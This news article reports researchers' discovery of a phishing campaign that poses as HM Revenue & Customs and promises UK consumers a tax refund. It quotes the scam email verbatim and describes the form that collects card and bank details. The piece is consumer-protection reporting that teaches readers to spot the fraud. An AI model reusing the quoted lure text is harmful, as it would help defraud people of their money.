Cybercriminals tap into tax to scam consumers

Evolving beyond long-lost uncles in Africa or winning the Spanish lottery, the latest phishing campaign centers around something we all love -- the arrival of a tax refund.

Cybercriminals, who delight in taking our money, are now using the lure of returned funds to scam us in the latest campaign to hit both our email and bank accounts.

In the United Kingdom, whether you are on payroll or self-employed, you pay tax through HM Revenue & Customs (HMRC). If you have overpaid and are due a refund, the agency contacts you through the post and sends you a cheque. However, as organizations now rely more on email and less on snail mail, the latest phishing campaign which poses as the HMRC doesn't sound implausible.

Researchers over at the Malwarebytes blog have discovered a new scam which targets U.K. consumers by sending fake HMRC tax refund attachments via email, before working malicious magic on your system if clicked upon. The phishing email is below:

Screen Shot 2013-12-10 at 19.51.23

Within the email, the scammers -- posing as the HMRC -- say:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application.

In order to process your refund you will need to complete the attached application form. Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email

– open it in a browser

– follow the instructions on your screen

Regards, HM Revenue & Customs

Some key points are clues that show you this 'refund' is fake. Small grammar mistakes and the "inability" to speak to a human operator on the phone about the refund point to a scam -- where the ringleaders would prefer you did not talk to an actual member of the HMRC who would be able to shoot down the campaign.

The information requested within the attachment includes your full name, address, date of birth, card number, sort code, account number, telephone, verification code and more -- all extremely valuable data which could allow your account to be cleaned out -- not the best idea coming up to Christmas.

However, when you try to submit the form, there is a glaring spelling mistake on the button. It says "Submit informations," which should ring more alarm bells -- but not every consumer will notice this. The researchers say that hitting the submit button sends the information via form to a .biz URL which appears to be compromised.

Screen Shot 2013-12-11 at 09.59.12

The golden rule? HMRC will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.